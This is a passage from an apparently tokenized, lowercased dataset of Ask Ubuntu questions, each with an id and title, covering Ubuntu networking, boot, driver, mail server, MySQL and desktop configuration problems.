terminal . i think the terminal is n't outputting what it should when i run the ifconfig command : ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:137 errors:0 dropped:0 overruns:0 frame:0 tx packets:137 erros:0 dropped : 0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:11575 ( 11.5 kb ) tx bytes:11575 ( 11.5 kb ) one last thing , after installing the os and choosing shut down because i did n't have anything to do yet , the laptop eventually reached a state where it had a black screen and a bunch of command lines and it remained like that for an hour . i had to hold the power button to shut down the laptop completely . any help is appreciated . thanks ! : ) edit : i forgot to add that both my ethernet and network controllers are by broadcom . i think this might be closely related to the problem but i could n't find a solution on google : /
405950	global keyboard shortcut for new browser tab	i 'm coming from os x and i was using quicksilver and applescripts to create global shortcuts for common actions . one that i used a whole lot was to open a new tab in chrome and focus the omnibox , allowing me to do web searches etc with the chrome completion doing lots of useful work for me . i would like a similar setup . i 'm using compiz and unity so i already found that ccsm will let me set up keyboard shortcuts for commands , so all i need is a command that will focus on a new chrome tab . i already tried xdg-open about : blank which almost does what i want , but it leaves 'about : blank ' in the url bar and the cursor not selecting it , so i 'd have to do ctrl-a as well then . there 's also a chrome url chrome : //newtab but xdg-open opens that in firefox . so basically , any way to achieve this would be appreciated , be it via d-bus , xdg or x11 event injection ( but robustly ) .
405952	why does the startup block access to my bootable usb ?	i recently installed ubuntu long term support on this pc . the pc is to be passed on to a family member who wants an installation of windows . i have attempted to boot from a bootable windows cd , a bootable windows usb , and a bootable avg recovery usb . every time the system attempts to access the usb stick the system stops it and displays a message with the general message of disc access blocked by system ... how can i gain access to my bootable usb ?
405958	upgrade kernel to 3.8.0-35-generic fails to boot . missing initrd.img-3.8.0-29-generic	when upgrading to the new kernel 3.8.0-35-generic ( 12.04 lts ) it does n't create the initrd.img file and wo n't boot . i get a kernel panic because it 's missing the img i tried running sudo update-initramfs -c -k 3.8.0-35-generic but it does nothing . no image file is created
405960	can `cat` show files using code markup in colors ?	sometimes i quickly want to view the contents of a file from the command line . for this i of course use cat , but it is often source files in python , java or simple html . for these files it would be handy if cat could give some color markup to the files , so that it reads more easy . can cat do such a thing ?
405961	vim colorschemes do n't appear correct when using sudoedit	i 've been trying to be a good little sysadmin and use sudoedit , instead of sudo vim , or sudo -i ; vim , when making changes to root owned files ( ex /etc/profile ) , but my vim colorscheme does n't seem to show up right when using sudoedit . the colorsceme is loading correctly , ( checked via : color ) . i 've confirmed it 's not pulling up the colorscheme for root , as the problem appears when doing a sudoedit from root as well , the colors are different , even though it shows the same scheme . using : 12.04 lts vim : 2:7.3.429-2ubuntu2.1 sudo : 1.8.3p1-1ubuntu3.4 edits : vim is being run : ubuntu @ ip-10-0-0-104 : ~ $ ps -f -u ubuntu uid pid ppid c stime tty time cmd ubuntu 4433 4345 0 19:18 ? 00:00:00 sshd : ubuntu @ notty ubuntu 6109 6021 0 20:47 ? 00:00:00 sshd : ubuntu @ pts/0 ubuntu 6110 6109 0 20:47 pts/0 00:00:00 -bash ubuntu 6233 6232 0 20:48 pts/0 00:00:00 /usr/bin/vim /var/tmp/profile.xxqiloee ubuntu 6322 6234 0 20:49 ? 00:00:00 sshd : ubuntu @ pts/1 ubuntu 6323 6322 0 20:49 pts/1 00:00:00 -bash ubuntu 6461 6323 0 20:50 pts/1 00:00:00 ps -f -u ubuntu here is an example of what i 'm talking about . ( other hilghlights do n't work as well , but i figured one picture would be sufficient )
405967	where is my ruby installed when i install through rvm ?	right now i am running ruby 1.9 , which i installed using rvm . i needed that to run my redmine 2.4.2 , since i had trouble using 1.8 . now i need to configure my passenger mod to point to ruby 1.9 but i ca n't find it . right now its configured like this : < ifmodule mod_passenger.c > passengerroot /usr passengerruby /usr/bin/ruby passengerdefaultuser www-data < /ifmodule > and since i get the same error as before , i guess it still uses my old 1.8 version . running ubuntu precise 12.04 if you need additional information , please let me know .
405978	what does sigusr1 mean in `` killall -sigusr1 tint2 ''	i want to use tint2 as my panel in an openbox session . the tint2 configuration file is ~/.config/tint2/tint2rc . the tint2 configuration instructions have this : when you change the config file , the command line 'killall -sigusr1 tint2 ' will force tint2 to reload it . what does killall -sigusr1 do ? in other words , how does running killall -sigusr1 tint2 cause tint2rc to be reloaded ? edit : it appears that ~/.conkyrc can be reloaded the same way . from man conky : an easy way to force conky to reload your ~/.conkyrc : `` killall -sigusr1 conky '' . saves you the trouble of having to kill and then restart . you can now also do the same with sighup .
405983	just installed ubuntu13.10 . it is very very very slow to start up	please help . i even reinstalled it . it took me 10min to log in . it makes me crazy . the system is ubuntu13.10 64bit .
405984	i can send mails from shell with php , but i ca n't send from the php web page	i 'm trying to send mails from a contact form in a page on my server . i followed this post . my php file /var/www/my_project/test.php is this : < ? php $ myemail = `` my_mail @ gmail.com '' ; $ subject = `` my subject '' ; $ message = `` my message `` ; mail ( $ myemail , $ subject , $ message ) ; echo `` sent '' ; ? > if i run the php file from the shell : php /var/www/my_project/test.php i receive the email in gmail , then , i 'm supposing ssmtp is well configured , right ? but if i run the php from the browser : http : //localhost/my_project/test.php it does n't send the mail and it creates this file with the email content : /var/www/dead.letter i did these steps too : costales @ server : ~ $ sudo cat /etc/php5/apache2/php.ini | grep sendmail sendmail_path = /usr/sbin/sendmail -t costales @ server : ~ $ sudo service apache2 reload costales @ server : ~ $ telnet smtp.gmail.com 587 trying 173.194.67.109 ... connected to gmail-smtp-msa.l.google.com . escape character is '^ ] ' . 220 mx.google.com esmtp dm2sm7052263wib.8 - gsmtp any idea please ? thanks in advance !
405985	decrease mount point partition	the mounting point / partition only uses a small fraction ( 7 % ) of the 132 gb originally allocated by the ubuntu installer . can i safely reallocate space from the / partition to the /home partition ? can i reduce / to 32 gb and add 100 gb to /home ? thanks for ur input : > )
405987	how do i target multiple files with handbrakecli ?	how do i target multiple files ( and or recursively through directories ) with handbrakecli like when using the gui ? when using the gui with mac i can select a folder with multiple files and queue the lot . i guess i 'm asking how do i queue with cli ?
405988	system is running low graphics mode	i uninstalled the unity from ubuntu mistakenly . when i restart computer it is giving `` the system is running low-graphics mode '' .i have tried different commands `` sudo apt-get autoclean '' , `` sudo apt-get autoremove '' etc but problem is not solve : ( how can i solve this regards
405989	use nautilus to open an ssh connection using hostname	i 'm trying to ssh another machine on my lan using the hostname because the local ip address gets re-assigned somewhat regularly ( we have issues with our isp and frequently have to reset our network ) . i have a laptop with the login freedom @ flex15 and currently local ip 192.168.1.11 and i have a desktop i am trying to connect to for file transfer with the login freedom @ barton and local ip 192.168.1.153 i think i just need some formatting clarification on how to connect using hostname . all the guides i read say to use something like : ssh : //username @ hostname but if i try : ssh : //freedom @ barton i get this error : oops ! something went wrong . unable to find the requested location . please check the spelling or the network settings . however , when using : ssh : //freedom @ 192.168.1.153 it works fine . so i 'm not sure what i 'm doing wrong here because all the documentation says i can use ssh : //hostname or ssh : //username @ hostname or something like that . it would be ideal to have some way to specific this machine that does not involve the ip address . thank you .
405993	usb drive auto-mounted by user but gets write permissions for root only	i am trying to use my ext4 usb drive but ubuntu 13 is currently mounting it with write permission only for root so with my normal user i ca n't write to it , without sudo . the first place i checked was dconf-editor which has the following options automount automount-open autorun-never autorun-x-content-ignore autorun-x-content-open-folder autorun-x-content-start-app and it seems to me there should be an option in there to control if i can write to the mounted usb drive , but no . i also made sure my user is in the relevant groups : fuse and plugdev i 've searched most of the internet and ca n't find a solution to change the permissions given by the mount operation . there 's literally nobody out there having this problem incredibly . a ton of people have issues because their drives mounts totally read-only , but not this way with only root write permission . i ca n't see any way of controlling what happens . i looked at setting the mount options using gnome-disks but drew a blank . it 's not in fstab but it does appear in the mount list or /etc/mtab : /dev/sdb1 /media/adam/wdpassport2t ext4 rw , nosuid , nodev , uhelper=udisks2 0 0 this is what appears in syslog if it helps : kernel : [ 111522.196770 ] usb 2-1 : usb disconnect , device number 6 kernel : [ 111525.384020 ] usb 2-1 : new high-speed usb device number 7 using ehci-pci kernel : [ 111525.565220 ] usb 2-1 : new usb device found , idvendor=1058 , idproduct=0820 kernel : [ 111525.565225 ] usb 2-1 : new usb device strings : mfr=1 , product=2 , serialnumber=5 kernel : [ 111525.565227 ] usb 2-1 : product : my passport 0820 kernel : [ 111525.565229 ] usb 2-1 : manufacturer : western digital kernel : [ 111525.565231 ] usb 2-1 : serialnumber : 575832314141334a34383631 kernel : [ 111525.565729 ] usb-storage 2-1:1.0 : usb mass storage device detected kernel : [ 111525.566203 ] scsi9 : usb-storage 2-1:1.0 mtp-probe : checking bus 2 , device 7 : `` /sys/devices/pci0000:00/0000:00:1d.7/usb2/2-1 '' mtp-probe : bus : 2 , device : 7 was not an mtp device kernel : [ 111526.564697 ] scsi 9:0:0:0 : direct-access wd my passport 0820 1007 pq : 0 ansi : 6 kernel : [ 111526.565063 ] scsi 9:0:0:1 : enclosure wd ses device 1007 pq : 0 ansi : 6 kernel : [ 111526.568096 ] sd 9:0:0:0 : attached scsi generic sg2 type 0 kernel : [ 111526.568202 ] ses 9:0:0:1 : attached enclosure device kernel : [ 111526.568263 ] ses 9:0:0:1 : attached scsi generic sg3 type 13 kernel : [ 111531.263108 ] sd 9:0:0:0 : [ sdb ] 3906963456 512-byte logical blocks : ( 2.00 tb/1.81 tib ) kernel : [ 111531.265100 ] sd 9:0:0:0 : [ sdb ] write protect is off kernel : [ 111531.265105 ] sd 9:0:0:0 : [ sdb ] mode sense : 47 00 10 08 kernel : [ 111531.266473 ] sd 9:0:0:0 : [ sdb ] no caching mode page found kernel : [ 111531.266479 ] sd 9:0:0:0 : [ sdb ] assuming drive cache : write through kernel : [ 111531.272224 ] sd 9:0:0:0 : [ sdb ] no caching mode page found kernel : [ 111531.272230 ] sd 9:0:0:0 : [ sdb ] assuming drive cache : write through kernel : [ 111531.284885 ] sdb : sdb1 kernel : [ 111531.288219 ] sd 9:0:0:0 : [ sdb ] no caching mode page found kernel : [ 111531.288223 ] sd 9:0:0:0 : [ sdb ] assuming drive cache : write through kernel : [ 111531.288227 ] sd 9:0:0:0 : [ sdb ] attached scsi disk kernel : [ 111531.751588 ] ext4-fs ( sdb1 ) : mounted filesystem with ordered data mode . opts : ( null ) udisksd [ 3131 ] : mounted /dev/sdb1 at /media/adam/wdpassport2t on behalf of uid 1000
405994	automatic language layout change for some windows	in a kde window frame : and then : in which some settings can be applied ; for example automatic sending of this application 's windows to a virtual desktop . i 'm looking for a setting in a similar way that automatically changes language layout to russian for all windows which contain 'aarvark ' in title bar . so any window with a title which contains 'aardvark ' as a substring , when clicked ( =focused ) , will change language layout to russian .
405995	how to permanently enable in-dash calculator in 13.10	in previous versions of ubuntu , i used a calculator scope from some ppa . it was very nice , worked snappily and generally behaved like calc . 13.10 has it 's own calculator , which can be used , but it stopped working after i disabled web results with unity tweak tool . even when it was working , it was sluggish , as if it only used the calculator if it found nothing else anywhere . i can still use the calculator by typing calculator:1+1 or enabling it from the filter results -menu . but those options defeat the purpose . how do i enable the calculator scope to always be triggered by default ?
405997	will ubuntu 13.10 boot if i enable compression on / which is a btrfs volume	i installed ubuntu 13.10 on btrfs and the installer created the following fstab : uuid=0eff8daf-5924-4a1f-922c-ec82ec594dc0 / btrfs defaults , subvol= @ 0 0 uuid=0eff8daf-5924-4a1f-922c-ec82ec594dc0 /home btrfs defaults , subvol= @ home 0 0 uuid=babcf82e-ec47-4e02-b73a-8eed7b51908f none swap sw 0 0 if i enable compression on / and /home by adding 'compression=lzo ' like this : btrfs defaults , compression=lzo , subvol= @ 0 0 will the system boot ? it says here : https : //help.ubuntu.com/community/btrfs # adding_filesystem_compression '' note : grub2 in 11.04 ca n't read lzo compressed root so you 'll need a /boot partition to use it . '' but what about grub2 in 13.10 ?
406005	laptop wakes thinking it 's charging when i 've unplugged it during sleep	if my laptop is plugged in as i press suspend , then i unplug it after she 's sleeping , when i wake her up , she still thinks she 's charging , even though the battery is discharging . to fix this i either have to wake her charging , or connect the charger and disconnect . is there another fix ? it 's not very important but i 'd like to know how long i have left if i 'm on a train or something .
406007	cinnamon launches wrong application	when i put in an usb-device cinnamon launches a totally useless app ( easytag ) . when i uninstall it , it my filemanager gets opened but after reinstalling , it switches back to easytag . what i tried is : delete ~/.local/share/applications delete ~/.local/share/mime
406008	new ssd gets errors when booting	i recently bought a 120gb kingston ssdnowv300 and i installed ubuntu 13.10 onto it . when i boot , it pauses at a flashing cursor for a huge amount of time . changing the boot flags to text showed a bunch of errors : jan 15 17:39:01 speshmesh kernel : [ 142.179159 ] ata3.00 : status : { drdy err } jan 15 17:39:01 speshmesh kernel : [ 142.179209 ] ata3.00 : error : { icrc abrt } jan 15 17:39:01 speshmesh kernel : [ 142.179259 ] ata3.00 : failed command : read fpdma queued jan 15 17:39:01 speshmesh kernel : [ 142.179312 ] ata3.00 : cmd 60/28 : c8:00:48 : c6/00:00:0b:00:00/40 tag 25 ncq 20480 in jan 15 17:39:01 speshmesh kernel : [ 142.179312 ] res 41/84 : d0:08:4a : c6/84:00:0b:00:00/40 emask 0x10 ( ata bus error ) jan 15 17:39:01 speshmesh kernel : [ 142.179392 ] ata3.00 : status : { drdy err } jan 15 17:39:01 speshmesh kernel : [ 142.179442 ] ata3.00 : error : { icrc abrt } jan 15 17:39:01 speshmesh kernel : [ 142.179492 ] ata3.00 : failed command : read fpdma queued jan 15 17:39:01 speshmesh kernel : [ 142.179545 ] ata3.00 : cmd 60/08 : d0:08:4a : c6/00:00:0b:00:00/40 tag 26 ncq 4096 in jan 15 17:39:01 speshmesh kernel : [ 142.179545 ] res 41/84 : d0:08:4a : c6/84:00:0b:00:00/40 emask 0x10 ( ata bus error ) this repeated over and over again until it eventually reached the last one and then finished the rest of booting : jan 15 17:39:01 speshmesh kernel : [ 142.180557 ] ata3.00 : status : { drdy err } jan 15 17:39:01 speshmesh kernel : [ 142.180607 ] ata3.00 : error : { icrc abrt } jan 15 17:39:01 speshmesh kernel : [ 142.180659 ] ata3 : hard resetting link jan 15 17:39:01 speshmesh kernel : [ 142.180708 ] ata3 : nv : skipping hardreset on occupied port jan 15 17:39:01 speshmesh kernel : [ 142.648026 ] ata3 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) it also occasionally hung for a long time at [ 100.247175 ] ata3 : eh complete . what could the problem be ? is it just a faulty ssd ?
406009	nvidia-331 nvidia-settings installation error	nroot @ ms-1762 : ~ $ sudo apt-get install nvidia-331 [ sudo ] password for nroot : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nvidia-331 : depends : x but it is not installable e : unable to correct problems , you have held broken packages . i ca n't install any nvidia drivers . when i try to install nvidia-319 nroot @ ms-1762 : ~ $ sudo apt-get install nvidia-319 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nvidia-319 : depends : nvidia-331 but it is not going to be installed e : unable to correct problems , you have held broken packages .
406010	how can i open a port on ubuntu ?	ubuntu 13.04 : no lsb modules are available distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring i 'm attempting to open port 8888 on an ubuntu vm that i 'm accessing with virtualbox/vagrant . on the vm , i run the following command vagrant @ vagrant-ubuntu-raring-32 : ~ $ curl -v 'http : //localhost:8888' and i get the following response : * about to connect ( ) to localhost port 8888 ( # 0 ) * trying 127.0.0.1 ... * connection refused * failed connect to localhost:8888 ; connection refused * closing connection 0 curl : ( 7 ) failed connect to localhost:8888 ; connection refused so i then try this ( per an answer i found here on askubuntu ) : sudo ufw allow 8888/tcp then i retry the curl command and i get the same thing . not that it should make any difference but i sudo the curl command and it makes no difference . i 've also reverted the machine to baseline and then run sudo ufw allow 8888 and that does n't work either . are there other things which might be blocking that port ?
406011	how can i specify or query the order dns servers will be queried ?	for some reason i am not hitting the dns server i am expecting to hit . i have a wireless connection with a vpn on top of it . i have set both of the connections to use a specific set of dns servers ( automatic dhcp addresses only with the dns servers listed ) , but it is still querying a different dns server . i can tell this is true because when i say dig +short the.domain.i.am.looking.for i get nothing , but when i say dig +short @ specific.dns the.domain.i.am.looking.for i get the ip address i am expecting . i have also temporarily modified /etc/reslov.conf to read the way i want it to and the first dig starts working . this means network manager is doing something sneaky behind my back . how can i tell what it is doing ? and how can i fix it so only the servers i specify ( in the order i specify them ) get queried ?
406012	how to correctly install libstdc++.so	it seems that no matter how i try , i am unable to install libstdc++.so . my guess is that this is supposed to be a symlink to libstdc++.so.version or something . but , no package seems to be providing this for x86_64 or i386 . how is this possible , and what do i do about it ? as a second question , what is the current state of multiarch ? if i am running ubuntu x86_64 12.04 lts , what am i supposed to install to target ( cross-compile ) c++ i386 ? why is this so complicated - and messy with such poor documentation ? i see hundreds of questions on various websites , including askubuntu , with out of date information . considering 12.04 is still a supported product , i would expect this information to be kept up to date somewhere obvious .
406018	wired connection not detected on ubuntu 12.04 lts , which was working fine few days ago . solution for `` wifi disabled by hardware switch on dell xps ''	this working and not working happens to me often , and i dont know , why this is happening . i am frustrated trying all the related threads but it couldnt solve my problem . this wired lan connection is working fine on windows 7 . i have made all pssible edits of /etc/network/interfaces , but no success please help . i dont know what all this etho , lo , stuff means why is this problem on ubuntu 12.04 but not on windows ? currently , my /etc/network/interfaces has auto lo iface lo inet loopback on running ifconfig , it gives : eth0 link encap : ethernet hwaddr 14 : fe : b5 : c5 : a2:0d up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:47 eth0 : avahi link encap : ethernet hwaddr 14 : fe : b5 : c5 : a2:0d inet addr:169.254.8.129 bcast:169.254.255.255 mask:255.255.0.0 up broadcast multicast mtu:1500 metric:1 interrupt:47 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:24 errors:0 dropped:0 overruns:0 frame:0 tx packets:24 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:2022 ( 2.0 kb ) tx bytes:2022 ( 2.0 kb ) pan1 link encap : ethernet hwaddr 46 : f9:3a : a8 : a6 : ca inet addr:10.63.169.1 bcast:10.63.169.255 mask:255.255.255.0 inet6 addr : fe80 : :44f9:3aff : fea8 : a6ca/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:100 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:15665 ( 15.6 kb ) wlan0 link encap : ethernet hwaddr 88:53:2e:10 : f8:24 inet addr:10.132.238.81 bcast:10.132.255.255 mask:255.255.0.0 inet6 addr : fe80 : :8a53:2eff : fe10 : f824/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:14890 errors:0 dropped:0 overruns:0 frame:0 tx packets:671 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1886759 ( 1.8 mb ) tx bytes:207660 ( 207.6 kb )
406019	whois with ipv6 support	i just tried a whois on an incoming ipv6 address . the whois program recommends upgrade . but to what ? i already have the latest version int he repo . is there a different program for ipv4/6 client discovery ? $ whois fe80:0000:0000:0000 : cabc : c8ff : fe93:6fad dst=ff02:0000:0000:0000:0000:0000:0000:00fb unknown as number or ip network . please upgrade this program .
406020	calling octave function from gtk+2 c code	how a built-in octave function can be called from a gtk+2 c code . i know how to call octave functions from c code by mex files , but i do n't know how i can call octave function from gtk+2 c code . is it possible to use mex files to call octave function from a gtk+2 c code .
406022	ca n't connect to mysql via cli or phpmyadmin , but wordpress still connects fine	this is the first time i 've had to reach out for a question -- i 'm truly stumped . i have mysql up and running on a linux server ( ubuntu ) and this morning tried to login to phpmyadmin . i received an error that said i ca n't login . so i went to the command line , typed in mysql -u root -p and when prompted for the password , entered it correctly . i then received the following error : error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : yes ) here 's the weird thing : i ca n't connect via mysql on the command line nor through phpmyadmin , but all my wordpress sites are working fine . however , if i try to login with one of the wp sites ' credentials , i get the same kind of error as above . i checked etc/mysql/my.cnf and saw : bind-address = 127.0.0.1 . i tried to comment this out and restart mysql , no luck . i tried to change bind-address to localhost , and still no luck . right now it 's back to bind-address = 127.0.0.1 . this is the same setting i have for a second linode with the exact same private ip/networking settings as this one ( i set both of their static ips up at the same time ) , yet the other server is working fine ( can connect to mysql ) and this one just seems to hate me . so the big question is : what is causing mysql to no longer allow me to connect , why can my wordpress sites still use their credentials ( but i ca n't via phpmyadmin nor the command line ) , and how can i prevent this from eluding me in the future ? possibly pertinent details : two days ago i setup a private ip on this linode . cat /etc/hosts does contain localhost 127.0.0.1 localhost.localdomain localhost ping localhost does return results : ping localhost ping localhost.localdomain ( 127.0.0.1 ) 56 ( 84 ) bytes of data . 64 bytes from localhost.localdomain ( 127.0.0.1 ) : icmp_req=1 ttl=64 time=0.066 ms 64 bytes from localhost.localdomain ( 127.0.0.1 ) : icmp_req=2 ttl=64 time=0.062 ms rebooted recently for the first time in two months -- could that have something to do with it ? it seems like the root password automagically just changed on me ... thank you so much for helping me out .
406026	ls command without username ?	i want to use ls -- full-time -lng but do not wish to list the user names at all . is there any way to do this ? i would consider -n and -g optional if it is conflicting with getting this done .
406032	combining multiple similar items on the launcher	i ca n't find this , but it could be i 'm not sure how to search for it . i have a lot of icons in my launcher . is there a way to combine some , i.e . firefox and chrome or libreoffice and gedit or graphics editors in one `` folder '' ?
406033	how to/can i dual boot ubuntu on my system	so i have a windows 8.1 64bit system , that uses bios instead of uefi , when i mounted ubuntu 12.04 to my thumb drive and tried to boot from a device in the advanced startup options i noticed there was no `` boot using device '' option . so the question is how would i go about dual booting ubuntu 12.04 and windows 8.1 ?
406034	ubuntu 13.10 : how to remember running applications on shutdown so that they start upon login ?	i 'm running ubuntu 13.10 and i do n't seem to have any of the same menu items mentioned in other questions . in my `` classicmenu '' i have a `` system tools '' > `` preferences '' and then nothing about sessions . according to software centre , i have gnome session manager install , but there 's no option to open it and searching for `` session '' in dash reveals only `` startup applications '' which is not at all what i 'm looking for and does not mention `` session '' anywhere . i 'm trying to access the session manger dialogue depicted here : https : //apps.ubuntu.com/cat/applications/saucy/gnome-session/ when i execute gnome-session in terminal , i get : gnome-session [ 5886 ] : warning : failed to acquire org.gnome.sessionmanager edit i 'm trying to enable the automatically remember running applications when logging out . options under session options
406035	running ubuntu on oracle vm virtualbox	i am installing ubuntu in oracle virtualbox on windows 8 . the system is freezing up at the last step where it says , `` installation is complete , you need to restart your computer . '' what should i do ?
406038	writing a bash script to read a text file of numbers into arrays , by column , on ubuntu	i 'm trying to write a little bash script on ubuntu 12.04 and have little experience . odd little problem converting a text file of numbers into arrays . i need all of the first numbers , second , etc into it 's own array because i 'll be running computations on numbers based on column more than the line it came from . all lines are 5 integers separated by spaces with a return at the end of each line . is a multidimensional array possible in bash ? thank you !
406039	from where do i install touchpad drivers for my laptop ?	from where do i install touchpad drivers for my samsung laptop series 3 in ubuntu ? my two finger scrolling doesnt seem to work here in ubuntu .
406041	not launching after install	it has been like 20 minutes and my computer is in the screen with the letters ubuntu and the five dots colored white/red and it doesnt do anything but change the colors of the dots . afetr instaling and rebooting it has a checklist where all but 1 said ok , i could't read which one said fail . i did a partition with windows 7 and ubuntu 13.10 . is this normal ? what should i do ?
406044	is adobe flash player plugin installer marked as `` important security update '' ?	why is adobe flash player plugin installer marked as `` important security update '' ? is security really compromised if one does not install that ?
406046	where is the option to add esperanto circumflexes ?	i had upgraded to 13.10 and esperanto circumflexes were still working . then i formatted and installed 13.10 , now i ca n't find the option to enable esperanto circumflexes . language : english layout : us international with dead keys
406048	how to create keyboard shortcut in ubuntu 12.04 for reboot/shutdown that can be executed by even non-root users	i wish to create a shortcut key for reboot/shutdownfor all the users ( including non-root users ) . i have tried creating a custom shortcut key ctrl+r and assigned it to the command âgksu rebootâ however ubuntu requires root privileges to execute the command and throws up the message failed to run reboot as root the underlying authorization mechanism ( sudo ) does not allow you to run this program . contact the system administrator . i do not wish to give root privileges to the users and essentially want to execute the shutdown/reboot ( that is usually accessed through the gear icon by all the users ) through commands using shortcut keys can someone please help ?
406055	errors when opening terminal	i have this error message when opening any terminal windows : '' there was an error creating the child process for this terminal '' failed to execute child process `` a-z '' ( no such file or directory )
406056	kdm falters / lags when reopening laptop lid	whenever i close my laptop ( hp 6730b ) lid , then reopen it , my computer seems to lag/falter . not only the mouse pointer falters but the whole system seems to be lagging . example : after clicking the k menu button it takes about a full second to respond . i 'm running ubuntu 12.04 lts with the kde desktop environment . the problem is solved when i sudo restart kdm . of course when i close my laptop lid again the problem returns . another strange property of my problem is that it does n't always occur . sometimes i can reopen the lid just fine without the occurrence of any complications . i also tried different actions on lid close like none and shut down screen but that does n't change anything . any ideas ? should i report this as a bug ?
406060	umask in ubuntu 13.10 : how to have user and group same permissions ?	i 've set umask 002 in /etc/login.defs ~/.bashrc ~/.profile in order to have read and write permissions for user and group . ( the idea is to give the ability for all the users of a same group to share their files ) umask command answers me 0002 but each time i create a new file , it shows read and write permission for user but only read permission for the group . where did i go wrong ?
406064	installing libmysql on ubuntu server 12.04	i really need help installing the dependency of this , which is libmysql ( here ) i really have no idea how to install it . the author requires me to put it in a specific directory , but i have had no luck doing that so far . he mentions that you need a .so file in the link above .
406065	ubuntu 13.10 internet connection problem	i recently installed ubuntu 13.10 on my hp pavilion dv7 . most of the time , when i close my laptop , and then reopen it , i can not connect to the internet , especially if i was only connected to wifi when i closed it . networks are not displayed . i used the rfkill list all command , and it showed that neither my lan or wifi was hard or soft blocked . to get the connection back , i have to restart my computer , which is obviously annoying , so i 'd like to get it to reconnect automatically . i 've been keeping up with updates . what might i do to fix this ?
406066	can not connect to pop3 or imap with dovecot	connections are refused on my server . note : i am trying to connect from localhost here . command i 'm trying to use to test : user @ hostname : ~ $ telnet localhost pop3 trying : :1 ... trying 127.0.0.1 ... telnet : unable to connect to remote host : connection refused same error when i try with imap . the dovecot wiki suggests trouble shooting for the issue , however i have already tried the fixes . i have the protocols added in the config , and i have the listen option set to * . my config is below . i am not sure what is wrong ? # # dovecot configuration file # if you 're in a hurry , see http : //wiki2.dovecot.org/quickconfiguration # `` doveconf -n '' command gives a clean output of the changed settings . use it # instead of copy & pasting files when posting to the dovecot mailing list . # ' # ' character and everything after it is treated as comments . extra spaces # and tabs are ignored . if you want to use either of these explicitly , put the # value inside quotes , eg . : key = `` # char and trailing whitespace `` # default values are shown for each setting , it 's not required to uncomment # those . these are exceptions to this though : no sections ( e.g . namespace { } ) # or plugin settings are added by default , they 're listed only as examples . # paths are also just examples with the real defaults being based on configure # options . the paths listed here are for configure -- prefix=/usr # -- sysconfdir=/etc -- localstatedir=/var # enable installed protocols ! include_try /usr/share/dovecot/protocols.d/*.protocol protocols = pop3 pop3s imap imaps pop3_uidl_format = % 08xu % 08xv # a comma separated list of ips or hosts where to listen in for connections . # `` * '' listens in all ipv4 interfaces , `` : : '' listens in all ipv6 interfaces . # if you want to specify non-default ports or anything more complex , # edit conf.d/master.conf . # listen = * , : : # base directory where to store runtime data . # base_dir = /var/run/dovecot/ # name of this instance . used to prefix all dovecot processes in ps output . # instance_name = dovecot # greeting message for clients . # login_greeting = dovecot ready . # space separated list of trusted network ranges . connections from these # ips are allowed to override their ip addresses and ports ( for logging and # for authentication checks ) . disable_plaintext_auth is also ignored for # these networks . typically you 'd specify your imap proxy servers here . # login_trusted_networks = # sepace separated list of login access check sockets ( e.g . tcpwrap ) # login_access_sockets = # show more verbose process titles ( in ps ) . currently shows user name and # ip address . useful for seeing who are actually using the imap processes # ( eg . shared mailboxes or if same uid is used for multiple accounts ) . # verbose_proctitle = no # should all processes be killed when dovecot master process shuts down . # setting this to `` no '' means that dovecot can be upgraded without # forcing existing client connections to close ( although that could also be # a problem if the upgrade is e.g . because of a security fix ) . # shutdown_clients = yes # if non-zero , run mail commands via this many connections to doveadm server , # instead of running them directly in the same process . # doveadm_worker_count = 0 # unix socket or host : port used for connecting to doveadm server # doveadm_socket_path = doveadm-server # space separated list of environment variables that are preserved on dovecot # startup and passed down to all of its child processes . you can also give # key=value pairs to always set specific settings . # import_environment = tz # # # # dictionary server settings # # # dictionary can be used to store key=value lists . this is used by several # plugins . the dictionary can be accessed either directly or though a # dictionary server . the following dict block maps dictionary names to uris # when the server is used . these can then be referenced using uris in format # `` proxy : : < name > '' .
406068	stream whole screen from ubunut to xbox 360	i 'm using something called minidlna to access my media ( stored on ubuntu ) from the xbox 360 . i 'm wondering if there 's any way to cast the entire display from the ubuntu laptop to be displayed on my tv ( connected to xbox via hdmi ) . is this at all possible using an xbox 360 ? if not , please suggest alternative hardware that will enable such a setup ( basically to use the tv as a wireless monitor for my laptop ) .
406070	fatal error ipmi_si	i have setup maas server successfully . i have added node manually by providing mac address . the node loads os dist from the server and this process is normal . the major problem is that system hang on fatal error inserting ipmi_si . after waiting for some time , node just shutdown . the new node does n't have ipmi feature . is it possible to declare a computer as node without ipmi ? if it is than what 's the issue that this node halt after giving this error . thanks .
